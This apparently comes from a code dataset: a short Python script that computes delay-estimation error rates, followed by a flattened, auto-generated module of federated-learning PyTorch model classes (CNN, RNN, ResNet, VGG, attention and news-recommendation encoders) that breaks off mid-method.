text stringlengths 38 1.54M |
|---|
#!/bin/python
import sys
import json
print "Parsing Delay-estimation statistics ..."
# Read the stdin for the data.
for line in sys.stdin:
# Only handle the specific entires.
if (not "DELAY-ESTIMATOR-JSON:" in line) :
continue
# print line
chainDelay = json.loads(line[len("DELAY-ESTIMATOR-JSON:"):])
error = chainDelay["BLACKBOX"] - chainDelay["ACCURATE"]
error_rate = error / chainDelay["ACCURATE"]
print line, error, ((error_rate) * 100), '%'
|
import sys
_module = sys.modules[__name__]
del sys
core = _module
client = _module
config = _module
dataloader = _module
dataset = _module
evaluation = _module
federated = _module
metrics = _module
model = _module
schema = _module
server = _module
strategies = _module
base = _module
dga = _module
fedavg = _module
utils = _module
trainer = _module
conf = _module
e2e_trainer = _module
experiments = _module
cifar_dataset = _module
dataloader = _module
model = _module
centralized_training = _module
download_and_convert_data = _module
data = _module
dataloader = _module
model = _module
model_vgg = _module
dataloader = _module
preprocess = _module
model = _module
dataloader = _module
preprocessing = _module
model = _module
dataloader = _module
group_normalization = _module
model = _module
dataloader = _module
model = _module
dataloader = _module
dataset = _module
preprocess_mind = _module
fednewsrec_model = _module
model = _module
dataloader = _module
model = _module
trainer_pt_utils = _module
trainer_utils = _module
dataloader = _module
model = _module
utility = _module
dataloader = _module
model = _module
RL = _module
extensions = _module
privacy = _module
analysis = _module
dp_kmeans = _module
metrics = _module
quant = _module
build_vocab = _module
create_data = _module
test_e2e_trainer = _module
data_utils = _module
dataloaders_utils = _module
adamW = _module
lamb = _module
lars = _module
from_json_to_hdf5 = _module
utils = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
patch_functional()
open = mock_open()
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
_global_config = args = argv = cfg = config = params = _mock_config()
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range
wraps = functools.wraps
import copy
import logging
import time
import numpy as np
import torch
from collections.abc import MutableMapping
from torch.utils.data import DataLoader as PyTorchDataLoader
from abc import ABC
from torch.utils.data import Dataset as PyTorchDataset
from abc import abstractmethod
import torch.distributed as dist
import torch as T
import random
from collections import defaultdict
import math
import re
import torch.nn as nn
from torch import nn
from torch.nn import functional as F
from sklearn.metrics import f1_score
import torchvision
import torchvision.transforms as transforms
import torch.nn.functional as F
import torch.optim as optim
from torch import Tensor
from torch.utils.model_zoo import load_url as load_state_dict_from_url
from typing import Type
from typing import Any
from typing import Callable
from typing import Union
from typing import List
from typing import Optional
from torch.nn.modules.batchnorm import _BatchNorm
import torch.utils.model_zoo as model_zoo
from torch.nn import CrossEntropyLoss
from sklearn.metrics import roc_auc_score
from torch.utils.data import RandomSampler
from torch.utils.data import SequentialSampler
from typing import Dict
from typing import Tuple
import warnings
from typing import Iterator
from torch.utils.data.dataset import Dataset
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import RandomSampler
from torch.utils.data.sampler import Sampler
from typing import NamedTuple
from collections import OrderedDict
from scipy.special import betainc
from scipy.special import betaln
from copy import deepcopy
from torch.utils.data import sampler
from torch.optim import Optimizer
import collections
import functools
from torch.optim.lr_scheduler import StepLR
from torch.optim.lr_scheduler import MultiStepLR
from torch.optim.lr_scheduler import ReduceLROnPlateau
class BaseModel(ABC, T.nn.Module):
"""This is a wrapper class for PyTorch models."""
@abstractmethod
def __init__(self, **kwargs):
super(BaseModel, self).__init__()
@abstractmethod
def loss(self, input):
"""Performs forward step and computes the loss
Returns:
torch: Computed loss.
"""
pass
@abstractmethod
def inference(self, input):
"""Performs forward step and computes metrics
Returns:
dict: The metrics to be computed. The following keys are
the minimum required by FLUTE during evaluations rounds:
- output
- acc
- batch_size
More metrics can be computed by adding the key with a
dictionary that includes the fields ´value´ and
´higher_is_better´ as follows:
{'output':output,
'acc': accuracy,
'batch_size': n_samples,
'f1_score': {'value':f1,'higher_is_better': True}}
"""
pass
def set_eval(self):
"""Bring the model into evaluation mode"""
self.eval()
def set_train(self):
"""Bring the model into training mode"""
self.train()
class Swish(nn.Module):
def forward(self, x):
return x * torch.sigmoid(x)
class ConvNormPool(nn.Module):
"""Conv Skip-connection module"""
def __init__(self, input_size, hidden_size, kernel_size, norm_type='bachnorm'):
super().__init__()
self.kernel_size = kernel_size
self.conv_1 = nn.Conv1d(in_channels=input_size, out_channels=hidden_size, kernel_size=kernel_size)
self.conv_2 = nn.Conv1d(in_channels=hidden_size, out_channels=hidden_size, kernel_size=kernel_size)
self.conv_3 = nn.Conv1d(in_channels=hidden_size, out_channels=hidden_size, kernel_size=kernel_size)
self.swish_1 = Swish()
self.swish_2 = Swish()
self.swish_3 = Swish()
if norm_type == 'group':
self.normalization_1 = nn.GroupNorm(num_groups=8, num_channels=hidden_size)
self.normalization_2 = nn.GroupNorm(num_groups=8, num_channels=hidden_size)
self.normalization_3 = nn.GroupNorm(num_groups=8, num_channels=hidden_size)
else:
self.normalization_1 = nn.BatchNorm1d(num_features=hidden_size)
self.normalization_2 = nn.BatchNorm1d(num_features=hidden_size)
self.normalization_3 = nn.BatchNorm1d(num_features=hidden_size)
self.pool = nn.MaxPool1d(kernel_size=2)
def forward(self, input):
conv1 = self.conv_1(input)
x = self.normalization_1(conv1)
x = self.swish_1(x)
x = F.pad(x, pad=(self.kernel_size - 1, 0))
x = self.conv_2(x)
x = self.normalization_2(x)
x = self.swish_2(x)
x = F.pad(x, pad=(self.kernel_size - 1, 0))
conv3 = self.conv_3(x)
x = self.normalization_3(conv1 + conv3)
x = self.swish_3(x)
x = F.pad(x, pad=(self.kernel_size - 1, 0))
x = self.pool(x)
return x
class nlp_rnn_fedshakespeare(nn.Module):
def __init__(self, embedding_dim=8, vocab_size=90, hidden_size=256):
super(nlp_rnn_fedshakespeare, self).__init__()
self.embeddings = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim, padding_idx=0)
self.lstm = nn.LSTM(input_size=embedding_dim, hidden_size=hidden_size, num_layers=2, batch_first=True)
self.fc = nn.Linear(hidden_size, vocab_size)
def forward(self, input_seq):
embeds = self.embeddings(input_seq)
lstm_out, _ = self.lstm(embeds)
final_hidden_state = lstm_out[:, -1]
output = self.fc(lstm_out[:, :])
output = torch.transpose(output, 1, 2)
return output
class RNN(BaseModel):
"""This is a PyTorch model with some extra methods"""
def __init__(self, model_config):
super().__init__()
self.net = nlp_rnn_fedshakespeare()
def loss(self, input: torch.Tensor) ->torch.Tensor:
"""Performs forward step and computes the loss"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
x, target = input['x'], input['y']
output = self.net.forward(x)
criterion = nn.CrossEntropyLoss(ignore_index=0)
return criterion(output, target.long())
def inference(self, input):
"""Performs forward step and computes metrics"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
x, target = input['x'], input['y']
output = self.net.forward(x)
n_samples = x.shape[0]
pred = torch.argmax(output, dim=1)
mask = target != 0
accuracy = torch.sum((pred[mask] == target[mask]).float()).item()
accuracy = accuracy / mask.sum()
return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class Net(nn.Module):
def __init__(self, input_size=1, hid_size=64, n_classes=5, kernel_size=5):
super().__init__()
self.rnn_layer = RNN(input_size=46, hid_size=hid_size)
self.conv1 = ConvNormPool(input_size=input_size, hidden_size=hid_size, kernel_size=kernel_size)
self.conv2 = ConvNormPool(input_size=hid_size, hidden_size=hid_size, kernel_size=kernel_size)
self.avgpool = nn.AdaptiveMaxPool1d(1)
self.attn = nn.Linear(hid_size, hid_size, bias=False)
self.fc = nn.Linear(in_features=hid_size, out_features=n_classes)
def forward(self, input):
x = self.conv1(input)
x = self.conv2(x)
x_out, hid_states = self.rnn_layer(x)
x = torch.cat([hid_states[0], hid_states[1]], dim=0).transpose(0, 1)
x_attn = torch.tanh(self.attn(x))
x = x_attn.bmm(x_out)
x = x.transpose(2, 1)
x = self.avgpool(x)
x = x.view(-1, x.size(1) * x.size(2))
x = F.softmax(self.fc(x), dim=-1)
return x
class CNN_DropOut(torch.nn.Module):
"""
Recommended model by "Adaptive Federated Optimization" (https://arxiv.org/pdf/2003.00295.pdf)
Used for EMNIST experiments.
When `only_digits=True`, the summary of returned model is
```
Model:
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
reshape (Reshape) (None, 28, 28, 1) 0
_________________________________________________________________
conv2d (Conv2D) (None, 26, 26, 32) 320
_________________________________________________________________
conv2d_1 (Conv2D) (None, 24, 24, 64) 18496
_________________________________________________________________
max_pooling2d (MaxPooling2D) (None, 12, 12, 64) 0
_________________________________________________________________
dropout (Dropout) (None, 12, 12, 64) 0
_________________________________________________________________
flatten (Flatten) (None, 9216) 0
_________________________________________________________________
dense (Dense) (None, 128) 1179776
_________________________________________________________________
dropout_1 (Dropout) (None, 128) 0
_________________________________________________________________
dense_1 (Dense) (None, 10) 1290
=================================================================
Total params: 1,199,882
Trainable params: 1,199,882
Non-trainable params: 0
```
Args:
only_digits: If True, uses a final layer with 10 outputs, for use with the
digits only MNIST dataset (http://yann.lecun.com/exdb/mnist/).
If False, uses 62 outputs for Federated Extended MNIST (FEMNIST)
EMNIST: Extending MNIST to handwritten letters: https://arxiv.org/abs/1702.05373.
Returns:
A `torch.nn.Module`.
"""
def __init__(self, only_digits=True):
super(CNN_DropOut, self).__init__()
self.conv2d_1 = torch.nn.Conv2d(1, 32, kernel_size=3)
self.max_pooling = nn.MaxPool2d(2, stride=2)
self.conv2d_2 = torch.nn.Conv2d(32, 64, kernel_size=3)
self.dropout_1 = nn.Dropout(0.25)
self.flatten = nn.Flatten()
self.linear_1 = nn.Linear(9216, 128)
self.dropout_2 = nn.Dropout(0.5)
self.linear_2 = nn.Linear(128, 10 if only_digits else 62)
self.relu = nn.ReLU()
def forward(self, x):
x = torch.unsqueeze(x, 1)
x = self.conv2d_1(x)
x = self.relu(x)
x = self.conv2d_2(x)
x = self.relu(x)
x = self.max_pooling(x)
x = self.dropout_1(x)
x = self.flatten(x)
x = self.linear_1(x)
x = self.relu(x)
x = self.dropout_2(x)
x = self.linear_2(x)
return x
class CNN(BaseModel):
"""This is a PyTorch model with some extra methods"""
def __init__(self, model_config):
super().__init__()
self.net = CNN_DropOut(False)
def loss(self, input: torch.Tensor) ->torch.Tensor:
"""Performs forward step and computes the loss"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
criterion = nn.CrossEntropyLoss()
return criterion(output, labels.long())
def inference(self, input):
"""Performs forward step and computes metrics"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
n_samples = features.shape[0]
accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
def group_norm(input, group, running_mean, running_var, weight=None, bias=None, use_input_stats=True, momentum=0.1, eps=1e-05):
"""Applies Group Normalization for channels in the same group in each data sample in a
batch.
See :class:`~torch.nn.GroupNorm1d`, :class:`~torch.nn.GroupNorm2d`,
:class:`~torch.nn.GroupNorm3d` for details.
"""
if not use_input_stats and (running_mean is None or running_var is None):
raise ValueError('Expected running_mean and running_var to be not None when use_input_stats=False')
b, c = input.size(0), input.size(1)
if weight is not None:
weight = weight.repeat(b)
if bias is not None:
bias = bias.repeat(b)
def _instance_norm(input, group, running_mean=None, running_var=None, weight=None, bias=None, use_input_stats=None, momentum=None, eps=None):
if running_mean is not None:
running_mean_orig = running_mean
running_mean = running_mean_orig.repeat(b)
if running_var is not None:
running_var_orig = running_var
running_var = running_var_orig.repeat(b)
input_reshaped = input.contiguous().view(1, int(b * c / group), group, *input.size()[2:])
out = F.batch_norm(input_reshaped, running_mean, running_var, weight=weight, bias=bias, training=use_input_stats, momentum=momentum, eps=eps)
if running_mean is not None:
running_mean_orig.copy_(running_mean.view(b, int(c / group)).mean(0, keepdim=False))
if running_var is not None:
running_var_orig.copy_(running_var.view(b, int(c / group)).mean(0, keepdim=False))
return out.view(b, c, *input.size()[2:])
return _instance_norm(input, group, running_mean=running_mean, running_var=running_var, weight=weight, bias=bias, use_input_stats=use_input_stats, momentum=momentum, eps=eps)
class _GroupNorm(_BatchNorm):
def __init__(self, num_features, num_groups=1, eps=1e-05, momentum=0.1, affine=False, track_running_stats=False):
self.num_groups = num_groups
self.track_running_stats = track_running_stats
super(_GroupNorm, self).__init__(int(num_features / num_groups), eps, momentum, affine, track_running_stats)
def _check_input_dim(self, input):
return NotImplemented
def forward(self, input):
self._check_input_dim(input)
return group_norm(input, self.num_groups, self.running_mean, self.running_var, self.weight, self.bias, self.training or not self.track_running_stats, self.momentum, self.eps)
class GroupNorm2d(_GroupNorm):
"""Applies Group Normalization over a 4D input (a mini-batch of 2D inputs
with additional channel dimension) as described in the paper
https://arxiv.org/pdf/1803.08494.pdf
`Group Normalization`_ .
Args:
num_features: :math:`C` from an expected input of size
:math:`(N, C, H, W)`
num_groups:
eps: a value added to the denominator for numerical stability. Default: 1e-5
momentum: the value used for the running_mean and running_var computation. Default: 0.1
affine: a boolean value that when set to ``True``, this module has
learnable affine parameters. Default: ``True``
track_running_stats: a boolean value that when set to ``True``, this
module tracks the running mean and variance, and when set to ``False``,
this module does not track such statistics and always uses batch
statistics in both training and eval modes. Default: ``False``
Shape:
- Input: :math:`(N, C, H, W)`
- Output: :math:`(N, C, H, W)` (same shape as input)
Examples:
>>> # Without Learnable Parameters
>>> m = GroupNorm2d(100, 4)
>>> # With Learnable Parameters
>>> m = GroupNorm2d(100, 4, affine=True)
>>> input = torch.randn(20, 100, 35, 45)
>>> output = m(input)
"""
def _check_input_dim(self, input):
if input.dim() != 4:
raise ValueError('expected 4D input (got {}D input)'.format(input.dim()))
def norm2d(planes, num_channels_per_group=32):
None
if num_channels_per_group > 0:
return GroupNorm2d(planes, num_channels_per_group, affine=True, track_running_stats=False)
else:
return nn.BatchNorm2d(planes)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, group_norm=0):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm2d(planes, group_norm)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm2d(planes, group_norm)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, group_norm=0):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = norm2d(planes, group_norm)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = norm2d(planes, group_norm)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = norm2d(planes * 4, group_norm)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, group_norm=0):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm2d(64, group_norm)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0], group_norm=group_norm)
self.layer2 = self._make_layer(block, 128, layers[1], stride=2, group_norm=group_norm)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2, group_norm=group_norm)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2, group_norm=group_norm)
self.avgpool = nn.AvgPool2d(1)
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2.0 / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, GroupNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
for m in self.modules():
if isinstance(m, Bottleneck):
m.bn3.weight.data.fill_(0)
if isinstance(m, BasicBlock):
m.bn2.weight.data.fill_(0)
def _make_layer(self, block, planes, blocks, stride=1, group_norm=0):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), norm2d(planes * block.expansion, group_norm))
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, group_norm))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, group_norm=group_norm))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class VGG(nn.Module):
"""
VGG model
"""
def __init__(self, vgg, num_class, topK_results=None):
super(VGG, self).__init__()
self.topK_results = num_class if topK_results is None else topK_results
self.vgg = vgg
self.classifier = nn.Sequential(nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Linear(512, num_class))
if 0:
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2.0 / n))
m.bias.data.zero_()
def forward(self, inputs):
inputs = inputs['x'] if T.cuda.is_available() else inputs['x']
x = self.vgg(inputs.view(-1, 3, 32, 32))
x = T.flatten(x, 1)
x = self.classifier(x)
return x
def loss(self, inputs):
targets = inputs['y'] if T.cuda.is_available() else inputs['y']
output = self(inputs)
loss = T.nn.functional.cross_entropy(output, targets)
return loss
def inference(self, inputs):
targets = inputs['y'] if T.cuda.is_available() else inputs['y']
output = self(inputs)
accuracy = T.mean((T.argmax(output, dim=1) == targets).float()).item()
output = {'probabilities': output.cpu().detach().numpy(), 'predictions': np.arange(0, targets.shape[0]), 'labels': targets.cpu().numpy()}
return {'output': output, 'val_acc': accuracy, 'batch_size': targets.shape[0]}
def get_logit(self, inputs=None, evalis=True, logmax=False):
data, targets = inputs
if logmax:
Softmax = T.nn.LogSoftmax(dim=1)
else:
Softmax = T.nn.Softmax(dim=1)
data = data if T.cuda.is_available() else data
if evalis:
self.eval()
with T.no_grad():
output = self.forward(data)
logits = Softmax(output)
else:
self.train()
output = self.forward(data)
logits = Softmax(output)
loss = T.nn.functional.cross_entropy(output, targets)
return logits.cpu(), targets.cpu(), loss.cpu()
def copy_state_dict(self, state_dict):
self.state_dict = state_dict.clone()
def set_eval(self):
"""
Bring the model into evaluation mode
"""
self.eval()
def set_train(self):
"""
Bring the model into train mode
"""
self.train()
class LogisticRegression(torch.nn.Module):
def __init__(self, input_dim, output_dim):
super(LogisticRegression, self).__init__()
self.linear = torch.nn.Linear(input_dim, output_dim)
def forward(self, x):
o = self.linear(x.view(-1, 28 * 28))
outputs = torch.sigmoid(o)
return outputs
class LR(BaseModel):
"""This is a PyTorch model with some extra methods"""
def __init__(self, model_config):
super().__init__()
self.net = LogisticRegression(model_config['input_dim'], model_config['output_dim'])
def loss(self, input: torch.Tensor) ->torch.Tensor:
"""Performs forward step and computes the loss"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
criterion = nn.CrossEntropyLoss()
return criterion(output, labels.long())
def inference(self, input):
"""Performs forward step and computes metrics"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
n_samples = features.shape[0]
accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class GroupNorm3d(_GroupNorm):
"""
Assume the data format is (B, C, D, H, W)
"""
def _check_input_dim(self, input):
if input.dim() != 5:
raise ValueError('expected 5D input (got {}D input)'.format(input.dim()))
model_urls = {'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth', 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth', 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth', 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth'}
def resnet18(pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))
return model
class RESNET(BaseModel):
"""This is a PyTorch model with some extra methods"""
def __init__(self, model_config):
super().__init__()
self.net = resnet18()
def loss(self, input: torch.Tensor) ->torch.Tensor:
"""Performs forward step and computes the loss"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
return F.cross_entropy(output, labels.long())
def inference(self, input):
"""Performs forward step and computes metrics"""
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
n_samples = features.shape[0]
accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class SuperNet(BaseModel):
"""This is the parent of the net with some extra methods"""
def __init__(self, model_config):
super().__init__()
self.net = Net()
def loss(self, input: torch.Tensor):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
return F.cross_entropy(output, labels.long())
def inference(self, input):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
features, labels = input['x'], input['y']
output = self.net.forward(features)
n_samples = features.shape[0]
accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class AttentivePooling(nn.Module):
def __init__(self, dim1: int, dim2: int):
super(AttentivePooling, self).__init__()
self.dim1 = dim1
self.dim2 = dim2
self.dropout = nn.Dropout(0.2)
self.dense = nn.Linear(dim2, 200)
self.tanh = nn.Tanh()
self.dense2 = nn.Linear(200, 1)
self.softmax = nn.Softmax(dim=1)
def forward(self, x):
user_vecs = self.dropout(x)
user_att = self.tanh(self.dense(user_vecs))
user_att = self.dense2(user_att).squeeze(2)
user_att = self.softmax(user_att)
result = torch.einsum('ijk,ij->ik', user_vecs, user_att)
return result
def fromTensorFlow(self, tfmodel):
keras_weights = tfmodel.layers[1].get_weights()
self.dense.weight.data = torch.tensor(keras_weights[0]).transpose(0, 1)
self.dense.bias.data = torch.tensor(keras_weights[1])
keras_weights = tfmodel.layers[2].get_weights()
self.dense2.weight.data = torch.tensor(keras_weights[0]).transpose(0, 1)
self.dense2.bias.data = torch.tensor(keras_weights[1])
class Attention(nn.Module):
def __init__(self, input_dim, nb_head, size_per_head, **kwargs):
super(Attention, self).__init__(**kwargs)
self.input_dim = input_dim
self.nb_head = nb_head
self.size_per_head = size_per_head
self.output_dim = nb_head * size_per_head
self.WQ = nn.Linear(self.input_dim, self.output_dim, bias=False)
self.WK = nn.Linear(self.input_dim, self.output_dim, bias=False)
self.WV = nn.Linear(self.input_dim, self.output_dim, bias=False)
torch.nn.init.xavier_uniform_(self.WQ.weight, gain=np.sqrt(2))
torch.nn.init.xavier_uniform_(self.WK.weight, gain=np.sqrt(2))
torch.nn.init.xavier_uniform_(self.WV.weight, gain=np.sqrt(2))
def fromTensorFlow(self, tf, criteria=lambda l: l.name.startswith('attention')):
for l in tf.layers:
None
if criteria(l):
weights = l.get_weights()
self.WQ.weight.data = torch.tensor(weights[0].transpose())
self.WK.weight.data = torch.tensor(weights[1].transpose())
self.WV.weight.data = torch.tensor(weights[2].transpose())
def forward(self, x):
if len(x) == 3:
Q_seq, K_seq, V_seq = x
Q_len, V_len = None, None
Q_seq = self.WQ(Q_seq)
Q_seq = torch.reshape(Q_seq, (-1, Q_seq.shape[1], self.nb_head, self.size_per_head))
Q_seq = torch.transpose(Q_seq, 1, 2)
K_seq = self.WK(K_seq)
K_seq = torch.reshape(K_seq, (-1, K_seq.shape[1], self.nb_head, self.size_per_head))
K_seq = torch.transpose(K_seq, 1, 2)
V_seq = self.WV(V_seq)
V_seq = torch.reshape(V_seq, (-1, V_seq.shape[1], self.nb_head, self.size_per_head))
V_seq = torch.transpose(V_seq, 1, 2)
A = torch.einsum('ijkl,ijml->ijkm', Q_seq, K_seq) / self.size_per_head ** 0.5
A = torch.softmax(A, dim=-1)
O_seq = torch.einsum('ijkl,ijlm->ijkm', A, V_seq)
O_seq = torch.transpose(O_seq, 1, 2)
O_seq = torch.reshape(O_seq, (-1, O_seq.shape[1], self.output_dim))
return O_seq
class Permute(nn.Module):
def __init__(self, *dims):
super(Permute, self).__init__()
self.dims = dims
def forward(self, x):
return x.permute(*self.dims)
class SwapTrailingAxes(nn.Module):
def __init__(self):
super(SwapTrailingAxes, self).__init__()
def forward(self, x):
return x.transpose(-2, -1)
class DocEncoder(nn.Module):
def __init__(self):
super(DocEncoder, self).__init__()
self.phase1 = nn.Sequential(nn.Dropout(0.2), SwapTrailingAxes(), nn.Conv1d(300, 400, 3), nn.ReLU(), nn.Dropout(0.2), SwapTrailingAxes())
self.attention = Attention(400, 20, 20)
self.phase2 = nn.Sequential(nn.ReLU(), nn.Dropout(0.2), AttentivePooling(30, 400))
def fromTensorFlow(self, tfDoc):
None
for l in self.phase1:
if 'conv' in l._get_name().lower():
None
for lt in tfDoc.layers:
None
if 'conv' in lt.name.lower():
weights = lt.get_weights()
l.weight.data = torch.tensor(weights[0]).transpose(0, 2)
l.bias.data = torch.tensor(weights[1])
break
break
self.attention.fromTensorFlow(tfDoc)
None
for l in self.phase2:
if 'attentive' in l._get_name().lower():
for lt in tfDoc.layers:
None
if 'model' in lt.name.lower():
None
l.fromTensorFlow(lt)
def forward(self, x):
l_cnnt = self.phase1(x)
l_cnnt = self.attention([l_cnnt] * 3)
result = self.phase2(l_cnnt)
return result
class VecTail(nn.Module):
def __init__(self, n):
super(VecTail, self).__init__()
self.n = n
def forward(self, x):
return x[:, -self.n:, :]
class UserEncoder(nn.Module):
def __init__(self):
super(UserEncoder, self).__init__()
self.attention2 = Attention(400, 20, 20)
self.dropout2 = nn.Dropout(0.2)
self.pool2 = AttentivePooling(50, 400)
self.tail2 = VecTail(20)
self.gru2 = nn.GRU(400, 400, bidirectional=False, batch_first=True)
self.pool3 = AttentivePooling(2, 400)
def forward(self, news_vecs_input):
user_vecs2 = self.attention2([news_vecs_input] * 3)
user_vecs2 = self.dropout2(user_vecs2)
user_vec2 = self.pool2(user_vecs2)
user_vecs1 = self.tail2(news_vecs_input)
self.gru2.flatten_parameters()
user_vec1, _u_hidden = self.gru2(user_vecs1)
user_vec1 = user_vec1[:, -1, :]
user_vecs = torch.stack([user_vec1, user_vec2], dim=1)
vec = self.pool3(user_vecs)
return vec
def fromTensorFlow(self, tfU):
for l in tfU.layers:
None
if l.name == 'model_1':
self.pool2.fromTensorFlow(l)
elif l.name == 'model_2':
self.pool3.fromTensorFlow(l)
elif l.name == 'gru_1':
None
weights = l.get_weights()
for p in self.gru2.named_parameters():
s1 = p[1].data.shape
if p[0] == 'weight_ih_l0':
p[1].data = torch.tensor(weights[0]).transpose(0, 1).contiguous()
elif p[0] == 'weight_hh_l0':
p[1].data = torch.tensor(weights[1]).transpose(0, 1).contiguous()
elif p[0] == 'bias_ih_l0':
p[1].data = torch.tensor(weights[2])
elif p[0] == 'bias_hh_l0':
p[1].data = torch.zeros(p[1].data.shape)
None
self.attention2.fromTensorFlow(tfU)
class TimeDistributed(nn.Module):
def __init__(self, module):
super(TimeDistributed, self).__init__()
self.module = module
def forward(self, x):
if len(x.size()) <= 2:
return self.module(x)
output = torch.tensor([])
for i in range(x.size(1)):
output_t = self.module(x[:, i, :, :])
output_t = output_t.unsqueeze(1)
output = torch.cat((output, output_t), 1)
return output
class FedNewsRec(nn.Module):
def __init__(self, title_word_embedding_matrix):
super(FedNewsRec, self).__init__()
self.doc_encoder = DocEncoder()
self.user_encoder = UserEncoder()
self.title_word_embedding_layer = nn.Embedding.from_pretrained(torch.tensor(title_word_embedding_matrix, dtype=torch.float), freeze=True)
self.softmax = nn.Softmax(dim=1)
self.click_td = TimeDistributed(self.doc_encoder)
self.can_td = TimeDistributed(self.doc_encoder)
def forward(self, click_title, can_title):
click_word_vecs = self.title_word_embedding_layer(click_title)
can_word_vecs = self.title_word_embedding_layer(can_title)
click_vecs = self.click_td(click_word_vecs)
can_vecs = self.can_td(can_word_vecs)
user_vec = self.user_encoder(click_vecs)
